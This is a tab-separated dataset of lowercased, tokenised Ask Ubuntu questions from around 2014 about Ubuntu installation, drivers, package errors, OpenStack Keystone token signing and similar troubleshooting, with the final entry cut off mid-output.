402316	unable to sign token openstack when import image to glance	i just to try install openstack havana on my ubuntu 12.04 . i have setup keystone and glance # keystone-manage pki_setup -- keystone-user keystone -- keystone-group keystone 2014-01-08 22:54:10.250 1883 info keystone.common.openssl [ - ] openssl genrsa -out /etc/keystone/pki/private/cakey.pem 2048 generating rsa private key , 2048 bit long modulus ... ... ... ..+++ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... +++ e is 65537 ( 0x10001 ) 2014-01-08 22:54:10.445 1883 info keystone.common.openssl [ - ] openssl req -new -x509 -extensions v3_ca -key /etc/keystone/pki/private/cakey.pem -out /etc/keystone/pki/certs/cacert.pem -days 3650 -config /etc/keystone/pki/certs/openssl.conf -subj /c=us/st=unset/l=unset/o=unset/cn=www.meruvian.org 2014-01-08 22:54:10.607 1883 info keystone.common.openssl [ - ] openssl genrsa -out /etc/keystone/pki/private/signing_key.pem 2048 generating rsa private key , 2048 bit long modulus ... ... ... ... ... ... .+++ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .+++ e is 65537 ( 0x10001 ) 2014-01-08 22:54:11.021 1883 info keystone.common.openssl [ - ] openssl req -key /etc/keystone/pki/private/signing_key.pem -new -out /etc/keystone/pki/certs/req.pem -config /etc/keystone/pki/certs/openssl.conf -subj /c=us/st=unset/l=unset/o=unset/cn=www.meruvian.org 2014-01-08 22:54:11.030 1883 info keystone.common.openssl [ - ] openssl ca -batch -out /etc/keystone/pki/certs/signing_cert.pem -config /etc/keystone/pki/certs/openssl.conf -days 3650d -cert /etc/keystone/pki/certs/cacert.pem -keyfile /etc/keystone/pki/private/cakey.pem -infiles /etc/keystone/pki/certs/req.pem using configuration from /etc/keystone/pki/certs/openssl.conf check that the request matches the signature signature ok the subject 's distinguished name is as follows countryname : printable : 'us' stateorprovincename : asn.1 12 : 'unset' localityname : asn.1 12 : 'unset' organizationname : asn.1 12 : 'unset' commonname : asn.1 12 : 'www.atldomain.org' certificate is to be certified until jan 6 15:54:11 2024 gmt ( 3650 days ) write out database with 1 new entries data base updated now i can execute keystone command like user-list , role-list , etc but when i try to import image whith command like bellow , i got error # glance image-create -- name=cirros -- disk-format=qcow2 -- container-format=bare -- is-public=false -- location=cirros-0.3.0-x86_64-disk.img authorization failed : unable to sign token . ( http 500 ) bellow log on keystone.log 2014-01-08 23:34:57.193 15980 warning keystone.common.wsgi [ - ] unable to sign token . 2014-01-08 23:44:38.619 15980 error keystone.common.cms [ - ] signing error : unable to load certificate - ensure you 've configured pki with 'keystone-manage pki_setup' 2014-01-08 23:44:38.620 15980 error keystone.token.providers.pki [ - ] unable to sign token 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki traceback ( most recent call last ) : 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki file `` /opt/stack/keystone/keystone/token/providers/pki.py '' , line 39 , in _get_token_id 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki conf.signing.keyfile ) 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki file `` /opt/stack/keystone/keystone/common/cms.py '' , line 144 , in cms_sign_token 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki output = cms_sign_text ( text , signing_cert_file_name , signing_key_file_name ) 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki file `` /opt/stack/keystone/keystone/common/cms.py '' , line 139 , in cms_sign_text 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki raise environment.subprocess.calledprocesserror ( retcode , `` openssl '' ) 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki calledprocesserror : command 'openssl ' returned non-zero exit status 3 2014-01-08 23:44:38.620 15980 trace keystone.token.providers.pki 2014-01-08 23:44:38.621 15980 warning keystone.common.wsgi [ - ] unable to sign token . what is that error ? actually i have setup pki for keystone . what should i do to fix this problem ?
402318	transitioning from windows 7 to ubuntu 12.04	i have an hp pavilion g7 . intel i3 2.2ghz x4 core , windows 7 home premium ( 64bit ) , 4gb ram , 600gb hd . will happily provide more info if needed . i 've successfully installed ubuntu 12.04.3 alongside windows 7 just to see how difficult it was ( no problem at all ) . display , audio , touchpad , keyboard , wifi , drivers and ports are all working fine . so now i 'd like to make ubuntu my primary os and have w7 in my back pocket just in case . the logistics of seem easy enough . i plan on allocating the majority of my hd space to ubuntu and leaving 20gb or so to w7 . i believe the ubuntu installer will guide me through the partitioning . i 've backed up all the movies , music , files , ect . in case of a tragedy . the main foreseeable problem is that it 's my first time using a linux based os . i can navigate the gui easy enough but do n't know how to use the terminal at all . i 've rooted an old android a year or 2 ago which required some terminal commands that a friend walked me through . before i take the plunge , i just wanted to ask the community for any tips or advice that can make this transition easier and point out anything that i over looked . thanks in advance , people ! ! i look forward to your responses !
402326	how to manually run 'sudo dpkg -- configure -a ' ?	i was trying to remove adobe flash player and then install again but terminated the process . later when i tried to repeat , it does n't allow me to sudo apt-get remove flashplugin-installer . i get this message : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem how do i resolve this ?
402335	how does network manager gets started automatically at boot ?	can someone let me know how does network manager gets started automatically during the system start-up ? is there any script to do so.. ? just curious to know the fact..
402336	add right click sharing to ubuntu server 13.10 running gnome-shell 3.8 ?	new to ubuntu but some limited experience with other distros . i was trying out ubuntu desktop 12.04 lts and i was able to right click a folder and share it on my home network . i was n't crazy about the performance of the machine so , in an effort to get a lighter/stripped down install , i wiped it and installed ubuntu server 13.10 and gnome-shell 3.8 ( and a bunch of other things based on various how-to web pages to try to get the `` right click > share '' functionality back ) . i remembered that i had to install samba when i was using 12.04 so i installed that through synaptic . i did manage to get the personal file sharing preferences window to let me share files over the network but if i 'm not mistaken , that only shares the ~/public folder ( and i 've yet to test it ) . is it possible to get `` right click > share '' functionality in this configuration and if so how ? thanks
402337	skype incoming call problem	when i receive a video call from my contact and press the button to except there call , the skype dies . it end by itself . but when i call to my contact , it works fine . also after 40 to 50 min , the skype ends by itself . please help me , as i recently moved to ubuntu from windows .
402338	how to fix overheating and battery low life on asus k56cm ?	i have an asus k56cm ubuntu 12.04 runs well , but the temperature in idle is about 55-65 째c . and also my battery have a half less life then on windows7 . i tried jupiter but it does n't work . should i try a another version of linux ?
402341	how to enable drivers for bcm43142	my laptop is dell inspiron 17r 5720 . my os is ubuntu 13.10 . i was using wifi before but one day it stopped working . outputs of some commands : enedil @ enedil-dell : ~ $ lspci -k | grep -a2 broadcom 02:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) subsystem : dell wireless 1704 802.11n + bt 4.0 kernel driver in use : wl enedil @ enedil-dell : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no enedil @ enedil-dell : ~ $ lsmod | grep wl wl 4207760 0 cfg80211 480503 1 wl lib80211 14381 2 wl , lib80211_crypt_tkip enedil @ enedil-dell : ~ $ uname -a linux enedil-dell 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux enedil @ enedil-dell : ~ $ lspci -vvnn | grep 14e4 02:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) i do n't know what to do , especially that yesterday , i changed my internet connection to wireless . edit : when i click on network applet ( i 'm using unity ) i see message under grey wi-fi : device unsupported .
402346	can i change the lxde appearance from a css or similar type of file ? if yes , which file ?	i 'm experimenting with ubuntu on my android tablet using the complete linux installer app . i 'm using a light image of ubuntu 12.04 with lxde and openbox . i 'm trying to personalize the theme . i changed the lxpanel background and the menu icon and the wallpaper to my liking . these are pretty basic things but i want to change the background color , font color , etc . of the menu . i have done some googling but found only results related to changing the items present in the menu . is there a way i could change the menu appearance ? i do n't mind editing a stylesheet if there is any . please let me know of any way by which i could customize the menu instead of installing a new theme . thank you .
402347	install java 8 dpkg was interrupted	i 'm trying to install java 8 following the bellow links http : //linuxg.net/how-to-install-oracle-java-jdk-678-on-ubuntu-13-04-12-10-12-04/ http : //ubuntuhandbook.org/index.php/2013/07/install-oracle-java-6-7-8-on-ubuntu-13-10/ but this is what i get sudo apt-get purge openjdk* e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . the truth is i tried first sudo apt-get install oracle-java8-installer but it took way to long so i stop it after a while . no if i run sudo dpkg -- configure -a setting up oracle-java8-installer ( 8b121-0~webupd8~0 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing oracle-java8-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java8-installer even if i run sudo dpkg -- clear-avail & & sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ also i saw it in another question so i tried it . ps aux | grep apt | grep -v 'grep' root 2597 0.0 0.7 35084 14732 ? snl 18:26 0:01 /usr/bin/python /usr/sbin/aptd could someone explain me why is this happening , and what this lock and dpgk ?
402348	win7 & ubuntu fail , replaced ram , now error no . 5 while installing ubuntu , xp install fails & win 7 bsods	i had a dual boot system with windows 7 and ubuntu , everything was fine , but recently something went wrong , both the os began to hang , then the system was completely dead . i had to change the ram / ddr3 2gb . the system was alive , but i began having problems , windows xp installation was unsuccessful after many attempts , windows 7 install crashed a few times , but it was completed , however it keeps crashing again and again with a blue screen , and i am still unable to install ubuntu after many tries , it keeps giving error no , 5 ... ... ... . try moving to coooler.. ? i thougt it was the hard disk / sata 160 gb , i wiped everything with fdisk , and repartitioned , did scandisk etc , but still no luck , could it be the ram ... the board is zebronics g41 .
402351	ubuntu touch on tablet	i have chinese tablet point of view mobii protab26 and there is android on it ... i would really like to get ubuntu touch on it . can anyone help me please ?
402353	how to add /home/username/bin to $ path ?	show how you can add /home//bin to the $ path variable . use $ home ( or ~ ) to represent your home directory .
402354	where to find web-standard fonts for ubuntu ?	i would like to put these fonts : http : //www.ampsoft.net/webdesign-l/windowsmacfonts.html . in my .fonts folder of my ubuntu server ( heroku ) . where can i find these in a way that they are available for ubuntu and so i can put them in my .fonts folder and push it to heroku ? thanks .
402357	caps lock indicator is on after wake up	caps lock keyboard indicator is on after waking up from suspension , but in fact it is turned off . so i have to press the caps lock button twice to make it normal . so the problem is with indicator only , capitalization works . notebook : hp pavilion g6 1075er os : ubuntu 12.04 i came to ubuntu a month ago , and i never experienced this problem in windows . could n't find relevant answer on web . i have no changes for caps lock button in keyboard layout settings .
402359	key binding : /usr/lib/indicator-session/gtk-logout-helper -- s	i just upgraded from 13.4 to 13.10 & my custom key binding for shutdown or restart does n't work . it seems that /usr/lib/indicator-session/gtk-logout-helper does n't exist . any ideas or alternatives ? thanks barry
402362	ubuntu is too big for my screen	i have just installed ubuntu 13.4 on my desktop -- i am using a visio 32 '' tv as my monitor and have no problem with the screen size when windows is installed -- but with ubuntu i ca n't see the icons on the top or bottom and the icons on the left side are only partially showing its like the ubuntu screen is to big for my monitor -- does anybody have any advice ? ? ?
402368	help , i neeed to uninstall ubuntu	how can i uninstall ubuntu ? i dont like it that much . i want to install windows 7 back . i did not dual boot my computer ! i only have a usb no cd ... how can i install windows 7 back with a usb ? i tried using universal usb . it didnt work : /
402371	how to disable xscreensaver lock on suspend ?	i have recently installed ubuntu 12.04 lts and have installed xscreensaver . as i am the only user on this computer and i am only using the computer for music , movies , and some web browsing i have no need for the extra security of a lock screen . under user accounts , automatic login is turned on . under brightness and lock , the lock is turned off and require my password when waking from suspend is unchecked . under xscreensaver preferences , the lock screen box is unchecked . every time the computer goes into suspend i get an xscreensaver lock screen upon waking it . is there a setting i 'm missing or something ? from what i understand removing xscreensaver will fix this , but i would consider that a last resort if i can not resolve this issue as i like to use my photos as a screensaver . i have just began using linux and really do n't know what i 'm doing so you 're patience and and any help would be much appreciated .
402372	network connections - wired tab - edit button greyed out	there are multiple posts/questions about this but none actually have an answer that i could find . just installed ubuntu server 12.04 . added myself to the sudoers file , changed the networkmanager.conf from false to true ( just so i could see/edit the network connections . rebooted . now i can get in there , but the edit button for my wired connection is greyed out . so i find a post in the ubuntu forums that says to do sudo /etc/init.d/networking restart . i do that , then the console tells me this command is deprecated because it may not enable again some interfaces ... and tells me to change it ( ifupdown : managed=true ) back to false . i just want to set a static ip address and i can not believe it 's taken me ~30 minutes to do this . can anyone help me , the gui way ? i realize it may require some cli but ultimately i 'd like to get the gui working the way it should . i have tried `` maximizing '' the window to see if it uncovers an `` unlock '' button but there 's nothing to be found .
402377	simulate usb reconnect to change device number	i have a ps3 controller strangely does n't work if it 's connected as /dev/bus/usb/006/002 . if it gets assigned any other device number ( like /dev/bus/usb/006/003 ) then it starts working ( which can be achieved by unplugging and plugging it in again ) . i could n't figure out why that is the case so i thought maybe there is a way to simulate that usb unplugging and plugging in again . does anybody know how to do this ? edit after having gotten this question closed as a duplicate : i tried the solutions on the referenced ticket ( how do you reset a usb device from the command line ? ) but they provide no solution to my problem : they reset the usb device - but the device does not get a different device number assigned afterwards so the controller still does n't work until it is reconnected .
402378	dell inspiron 7000 15inch battery icon not visible until cable plugged in	so after fighting to get ubuntu 13.10 installed along side windows 8 in ( u ) efi mode , i am left with one strange issue . if i boot the laptop while not plugged into the wall no battery level applet is shown . once i plug the laptop into the wall the icon will appear , and then if i unplug all works fine . acpi shows nothing either . it seems like no battery is reported to the system even though its clearly there .
402379	logitech k400r wireless keyboard edge scroll	i got a logitech k400r keyboard with touchpad . two finger vertical and horizontal scrolling works fine but i find it very uncomfortable to scroll this way . the way i hold this device my right thumb sits comfortably on the right edge and it would be great to have a single finger edge scrolling , which does not seem supported by this device . is there a way to enable this ? thanks
402380	dell xps13 wlan runtime error ?	my problem is that the wlan is going off while i am working on the pc . if i reboot the system , wlan is active and works fine but after a while the wlan is going off and i can not connect . i must reboot . what can i do ? i am useing ubuntu 13.10 .
402381	ca n't get crontab to repeat command every five minutes	i 'm trying to make crontab run a sh script every 5 minutes . this is my root ( sudo crontab -e ) crontab setup : */5 * * * * /etc/test.sh and this is the script : # ! /bin/bash echo `` time : $ ( date ) '' edit : i 've made it work by using the user crontab file ( crontab -e ) but i still need to run my script with administrative privileges ...
402383	how can i know which is the source of an specific standard shared libraries ?	how can i get access to the source code of standard shared libraries ?
402384	downloading the whole content of my storage into another computer	my laptoo was stolen , so i 'd like to download the whole content stored in ubuntu one into another laptop . is is possible ? i can only find the option to download single files .
402389	how to boot automatically to an os in a dual boot system ( ubuntu 12.04 lts and windows 7 )	i had windows 7 installed on my computer , then i installed ubuntu 12.04 lts , both os installed in the same physical os . i want to bypass the grub boot menu , and set it to boot automatically to one of those , yet have a hot key to enter the grub to choose another os .
402393	help with the rt3290 wireless adapter	i know there is a lot of questions about rt3290 wireless adapter , but i read many many of them and noone helped me with my problem . so , i have the hp pavilion dm1 laptop and i installed xubuntu 13.10 on it . during the instalation it poped up that i 'm able to connect to the internet via network adapter . i did it obviously , but it worked for like 5 seconds , then it said that network connection is down and i could n't connect to my router , even if i could actually see network connections avaible . then ( when installation ended ) i rebooted my computer . my network was avaible ! i could connect and browse the internet smoothly . next day i turned on my laptop and i saw my wireless connection is no longer avaible , so i plugged laptop to the internet via ethernet cable and started to explore internet searching solution for my problem . i did this : how do i get a ralink rt3290 wireless card working ? and i was able to connect but my kernel started to panic every time i started mozilla or any program that is connecting to the internet . every tip i searched was almost the same as the link above . i tried to do this many ways . i even reinstalled xubuntu to do everything with clear system but the same thing happened . then i installed linux mint to check whether it is a major or just xubuntu problem . linux mint responded even worse , because i was n't even able to use terminal ( i clearly messed something up ) . i would really , really appreciate every help , because i do want to solve this problem and finally be able to use xubuntu/ubuntu . i 'm waiting for advice from anyone patiently . if anyone wants some details , just tell me which ones .
402394	how do i run ubuntu/run ubuntu alongside win 7	how do i use the iso file i get from download ?
402395	how to recover files from crashed windows computer with ubuntu	my hp pavillion crashed and i read that i could create a boot disk in order to retrieve my files by using ubuntu . the ubuntu-13.10 is in my download folder on a different laptop . when i select it , i 'm asked to use iso viewer or windows explorer to open . i am trying to get the file onto a dvd so i can put it in the crashed hp laptop . can someone assist . i have the file open using cyberlink iso viewer do i select wubi.exe to download to this laptop then put it on the dvd ?
402399	need help for installing kernel-2.6.35.7 on ubuntu	i 'm almost a new ubuntu user . just trying to configure my present ubuntu version for my school projects . i 'm using ubuntu 12.04 and i need to add kernel-2.6.35.7 with my machine . i 'd instruction so i tried to follow those for installing the kernel , seemed like i installed the kernel and upgrade grub2 also as a final step . after restarting , i found the new kernel version i installed was presented , but it just keeps working . i cant see the home page or dont get the ubuntu loading page . i also tried to check the recovery option , it seemed the process got stuck on my usb-2 and usb-3 ports for almost 30 minutes . what can i do ? whats wrong ? please suggest me : (
402402	system monitor only displays one type of incoming/outgoing traffic	somehow my system monitor is not set to display all ppp traffic but is limited to a single incoming/outgoing channel . for instance if it is set for wlan traffic i need to reset it if i use usb modem to connect in order to get it displayed in system monitor data section . how can i make it display the currently active connection in the `` data '' section of system monitor , weather via wlan , usb modem or other ?
402403	terminal stalls after sudo dpkg -- configure -a and others	i 'm trying to install the broadcom driver and have followed the instructions on the other threads . everything seems to go well until the end , after it prompts `` dkms : install completed '' the terminal stalls . it never brings up a new command prompt.i 've been around pcs a long time but have n't ever messed with ubuntu . also after the install the pc will not power down on its own , it stalls at the power graphic .
402404	i ca n't access any webpage on my chromium browser using proxy connection	i am using a 32 bit operator but installed a 64 bit ubuntu . i could n't install chrome no matter what the way i tried ( command in terminal , ubuntu software center ) . so i installed a chromium via ubuntu software center . i 'm using a proxy connection to access internet . i cant open any page in chromium.help me .
402405	how to make automatically boot in every computer ?	i am using ubuntu ( 13.10 ) on a flash-drive . i can move that flash drive all the time and can use it almost in every computer . but to do that , first i have to go to bios settings of the computer and make my flash driver priority first . but for example that imagine a computer that is turned off . i am connecting my flashdriver and opening the computer , and computer will start from my flash driver automatically . without changing the bios setting of computer . so my flashdriver must show itself as the first priority driver and so on , computer will start by ubuntu automatically . just do n't misunderstand me , this flashdriver is not a persistant stffs ... i have installed ubuntu to my flashdriver like how you do it for a normal hard-driver . so it is acting like a hard-driver all the time- just a little bit slower : ) . i hope i could explain myself , my english is not really good : ) . thanks advance .
402409	which ubuntu ( s ) supports switchable graphics [ dell 15r 5521 ]	i have just purchased brand new dell 15r 5521 ( spec . : http : //www.notebookcheck.net/dell-inspiron-15r-series.42377.0.html ) . characteristic feature of that unit is switchable graphics : radeon hd 8730m and intel hd 4000 onboard . which issue of ubuntu shall i choose for switchable graphics ? i have seen that dell 15r laptop had been awarded the status of certified for ubuntu 12.04 lts 64-bit , however when i look at the described components i see that only intel core processor integrated graphics controller has been mentioned - there is no info if ubuntu 12.04 will work with switchable graphics . i shall also add that i have already tried ubuntu 13.10 studio but i had great problems with installation and after i finally succeed i could not use the radeon at all , also intel graphics was not recognized . other problem was a great noise of the fan - i suppose it was cooler than the radeon . i have read many posts with different solutions but the general conclusion had been always that switchable graphics does not work well in linux . i do not see any way to switch off either of the graphic cards in the bios . from the description of amd-catalyst-13.12-linux-x86.x86_64 downloaded from http : //www2.ati.com/drivers/linux/amd-catalyst-13.12-linux-x86.x86_64.zip i see the radeon 8730m is not supported yet ( the same in case of latest beta drivers ) . does anybody know some sure way to disable radeon and let intel hd 400 be the only graphics card ? unfortunately it seems that dell has not foreseen such solution ( ? ) . so would anybody please let me know which issue of ubuntu shall i choose for my new-problematic dell 15r 5521 ?
402412	blank screen after i press try ubuntu without installing	i am trying to install ubuntu 13.10 . i get just a blank screen after i press try ubuntu without installing . i was thinking it would be an issue with nomodeset , but when i press f6 on the screen with other options , nothing happens .
402419	linux on a lenovo ideapad s510p	i 'm thinking of buying a lenovo ideapad s510p , and i want to install ubuntu on this . i wonder if anyone has any experience with this particular laptop , and running ubuntu on it .
402420	how to read ubuntu installed on the hard drive from the usb device ( no recover grub )	i had windows 7 and ubuntu on my hard drive working without any problems , but after installing a program called `` acronis true image '' and using its `` try and decide '' function , i lost grub . how do i recover the ubuntu installed on my hard drive ? do i use my usb device or cd ? edit : ok , thanks for your answers , but i think i was not very clear ... happens every time i run the application `` try and decide '' from `` acronis true image '' i lose the grub , what i want is to boot the ubuntu operating system on my computer from my usb device whenever i need it without having to restore the grub increasingly
402422	why apt-get wants to install cinnamon when i try to install nemo ?	my wallpaper in unity started behaving strangely some weeks ago and after much searching i finally understood it was cinnamon messing it . i never installed cinnamon myself , but use - i mean used - nemo . in the package catalogue there 's no reference to cinnamon packages as dependencies , but they surely got installed . there 's something i ca n't explain though : i installed nemo back in october , right after upgrading to ubuntu 13.10 , for about 2 months unity cohabited with nemo seamlessly ; i suspect cinnamon only got installed during an upgrade . the question is now why is the nemo dependency list fetched by apt-get different from the one in the package catalogue : $ sudo apt-get install nemo reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : cinnamon cinnamon-bluetooth cinnamon-common cinnamon-control-center cinnamon-control-center-data cinnamon-desktop-data cinnamon-screensaver cinnamon-session cinnamon-session-common cinnamon-settings-daemon cinnamon-translations cjs gir1.2-accountsservice-1.0 gir1.2-cinnamondesktop-3.0 gir1.2-gkbd-3.0 gir1.2-gtkclutter-1.0 gir1.2-muffin-3.0 gir1.2-polkit-1.0 gir1.2-upowerglib-1.0 gir1.2-xkl-1.0 libcinnamon-control-center1 libcinnamon-desktop0 libcjs0c libmozjs185-1.0 libmuffin0 libopencv-calib3d2.4 libopencv-contrib2.4 libopencv-core2.4 libopencv-features2d2.4 libopencv-flann2.4 libopencv-highgui2.4 libopencv-imgproc2.4 libopencv-legacy2.4 libopencv-ml2.4 libopencv-objdetect2.4 libopencv-photo2.4 libopencv-video2.4 libtbb2 muffin-common nemo-data nemo-fileroller python-opencv python-support recommended packages : gir1.2-cjsdbus-1.0 the following new packages will be installed cinnamon cinnamon-bluetooth cinnamon-common cinnamon-control-center cinnamon-control-center-data cinnamon-desktop-data cinnamon-screensaver cinnamon-session cinnamon-session-common cinnamon-settings-daemon cinnamon-translations cjs gir1.2-accountsservice-1.0 gir1.2-cinnamondesktop-3.0 gir1.2-gkbd-3.0 gir1.2-gtkclutter-1.0 gir1.2-muffin-3.0 gir1.2-polkit-1.0 gir1.2-upowerglib-1.0 gir1.2-xkl-1.0 libcinnamon-control-center1 libcinnamon-desktop0 libcjs0c libmozjs185-1.0 libmuffin0 libopencv-calib3d2.4 libopencv-contrib2.4 libopencv-core2.4 libopencv-features2d2.4 libopencv-flann2.4 libopencv-highgui2.4 libopencv-imgproc2.4 libopencv-legacy2.4 libopencv-ml2.4 libopencv-objdetect2.4 libopencv-photo2.4 libopencv-video2.4 libtbb2 muffin-common nemo nemo-data nemo-fileroller python-opencv python-support 0 upgraded , 44 newly installed , 0 to remove and 2 not upgraded . need to get 0 b/22.5 mb of archives . after this operation , 64.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? it would be great to use nemo without all that mess . thanks . update : the output of apt-cache policy : $ sudo apt-cache policy nemo nemo : installed : 2.0.8-0~webupd8~saucy candidate : 2.0.8-20140108010047-saucy version table : 2.0.8-20140108010047-saucy 0 500 http : //ppa.launchpad.net/gwendal-lebihan-dev/cinnamon-nightly/ubuntu/ saucy/main amd64 packages 2.0.8-20131203010044-saucy 0 500 http : //ppa.launchpad.net/gwendal-lebihan-dev/cinnamon-stable/ubuntu/ saucy/main amd64 packages *** 2.0.8-0~webupd8~saucy 0 100 /var/lib/dpkg/status 1.8.4-1 0 500 http : //de.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages
402425	getting data from the outside into my linux container ?	i 'm trying to seperate my database and my php application by using lxc . i 'm currently having some issues getting my code deployed to one of the containers - i do n't understand how this should work . my current setup is a vps which deployhq connects to over ssh - uploads the application from github and runs a few commands . but that solutions does n't seem possible with my containers - so my question is , what do i do now ? i can get the code to host machine - but how do i get the code to my container while still being sure user permissions on the guest are correct ?
402428	problem while booting from usb flash drive , black screen	i 'm new to linux and ubuntu , so i do n't know anything about this os . and it may sound silly to start using it but there 's a reason , i want to save data i have on an external hard drive that windows keep asking me to format . i do n't know if it 'll work , but in any case i 'd like to see how ubuntu work and `` play '' with it a little bit . so , here 's the problem . i 've downloaded a version of ubuntu on their website , so i think there 's little hope that the iso is the problem . i installed it in a usb flash drive . version of ubuntu : 12.04.3 desktop amd64 software used to install the iso : universal usb installer 1.9.5.1 my usb flash drive has 15 go free so i do n't think memory is the problem my computer is a asus republic of gamer , laptop , using windows 7 . my processor is a intel ( r ) core ( tm ) i7 cpu q720 with 8 go of ram and 64bit then , i restart , select boot from usb drive , i get into the menu of unbuntu , where you can choose to `` use whitout installing '' , `` install '' , and the other options . i first choose use without installing , since i just want to see what it is . so , i select the choice , press `` enter '' , i get to a screen where 's there 's a little loading with the ubuntu logo , and after a few seconds of loading i get to a pitch black screen . here 's what i 've tried to resolve the problem so far : 1 - re-install the same .iso in my usb flash drive 2 - re- download the version of ubuntu i want to use 3 - when in the boot menu , try to find help in the help section , from which i did n't understand a single thing 4 - scream ( it did n't do anything but it made me feel good ) i 've read that universal usb installer might be the problem , but before finding a new software , i want to know if there 's another place where it might be buggy . if anyone can help me , i would really appreciate , i do n't know a thing about linux but from what i 've heard , it can be a super os and i 'd hate to be stopped by a problem when trying to use it .
402444	via sg3 deltachrome igp , `` the system is running in low-graphic mode ''	i know that similar questions were already answered , but none have focused on the integrated graphics card named via sg3 deltachrome igp . i installed ubuntu 13.10 , and appeared an error message : '' the system is running in low-graphic mode '' .
402451	how do i run tor in saucy ( 13.10 ) ?	i am trying to run tor in saucy . in previous versions of ubuntu i would just go to the tor website download the program , extract it and then double click on a text file called `` start tor browser '' that was located in the tor folder . now all that happens when i double click on that file is it opens the actual text but not the tor browser bundle . any one know how to get tor started in the newest version of ubuntu ?
402454	`` install '' option disappeared from the software center	i can not install anything from the ubuntu software center ( on 13.10 ) . the `` install '' button is missing and only the one fore `` more information '' is there . i suspect it is a problem with the software repository cause i have been messing up with it trying to install openoffice but i do n't know how to fix it . any help ? after introducing this commands : sudo apt-get update sudo apt-get dist-upgrade this is what resulted : sudo apt-get update [ sudo ] password for joan : err http : //dl.google.com stable inrelease err http : //dl.google.com stable release.gpg no s'ha pogut resoldre «dl.google.com» err http : //ppa.launchpad.net saucy inrelease err http : //extras.ubuntu.com saucy inrelease err http : //ppa.launchpad.net saucy release.gpg no es pot connectar amb ppa.launchpad.net : http : err http : //extras.ubuntu.com saucy release.gpg no es pot connectar amb extras.ubuntu.com : http : err http : //es.archive.ubuntu.com saucy inrelease err http : //es.archive.ubuntu.com saucy-updates inrelease err http : //es.archive.ubuntu.com saucy-backports inrelease err http : //es.archive.ubuntu.com saucy release.gpg no es pot connectar amb es.archive.ubuntu.com : http : [ ip : 2a00:9ac0 : c1ca:6 : :135 80 ] err http : //es.archive.ubuntu.com saucy-updates release.gpg no es pot connectar amb es.archive.ubuntu.com : http : [ ip : 2a00:9ac0 : c1ca:6 : :135 80 ] err http : //es.archive.ubuntu.com saucy-backports release.gpg no es pot connectar amb es.archive.ubuntu.com : http : [ ip : 2a00:9ac0 : c1ca:6 : :135 80 ] err http : //security.ubuntu.com saucy-security inrelease err http : //security.ubuntu.com saucy-security release.gpg no es pot connectar amb security.ubuntu.com : http : [ ip : 2001:67c:1562 : :15 80 ] s'està llegint la llista de paquets… fet w : no s'ha pogut obtenir http : //es.archive.ubuntu.com/ubuntu/dists/saucy/inrelease w : no s'ha pogut obtenir http : //es.archive.ubuntu.com/ubuntu/dists/saucy-updates/inrelease w : no s'ha pogut obtenir http : //es.archive.ubuntu.com/ubuntu/dists/saucy-backports/inrelease w : no s'ha pogut obtenir http : //security.ubuntu.com/ubuntu/dists/saucy-security/inrelease w : no s'ha pogut obtenir http : //extras.ubuntu.com/ubuntu/dists/saucy/inrelease w : no s'ha pogut obtenir http : //dl.google.com/linux/chrome/deb/dists/stable/inrelease w : no s'ha pogut obtenir http : //ppa.launchpad.net/libreoffice/libreoffice-4-1/ubuntu/dists/saucy/inrelease w : no s'ha pogut obtenir http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg no s'ha pogut resoldre «dl.google.com» w : no s'ha pogut obtenir http : //ppa.launchpad.net/libreoffice/libreoffice-4-1/ubuntu/dists/saucy/release.gpg no es pot connectar amb ppa.launchpad.net : http : w : no s'ha pogut obtenir http : //extras.ubuntu.com/ubuntu/dists/saucy/release.gpg no es pot connectar amb extras.ubuntu.com : http : w : no s'ha pogut obtenir http : //es.archive.ubuntu.com/ubuntu/dists/saucy/release.gpg no es pot connectar amb es.archive.ubuntu.com : http : [ ip : 2a00:9ac0 : c1ca:6 : :135 80 ] w : no s'ha pogut obtenir http : //es.archive.ubuntu.com/ubuntu/dists/saucy-updates/release.gpg no es pot connectar amb es.archive.ubuntu.com : http : [ ip : 2a00:9ac0 : c1ca:6 : :135 80 ] w : no s'ha pogut obtenir http : //es.archive.ubuntu.com/ubuntu/dists/saucy-backports/release.gpg no es pot connectar amb es.archive.ubuntu.com : http : [ ip : 2a00:9ac0 : c1ca:6 : :135 80 ] w : no s'ha pogut obtenir http : 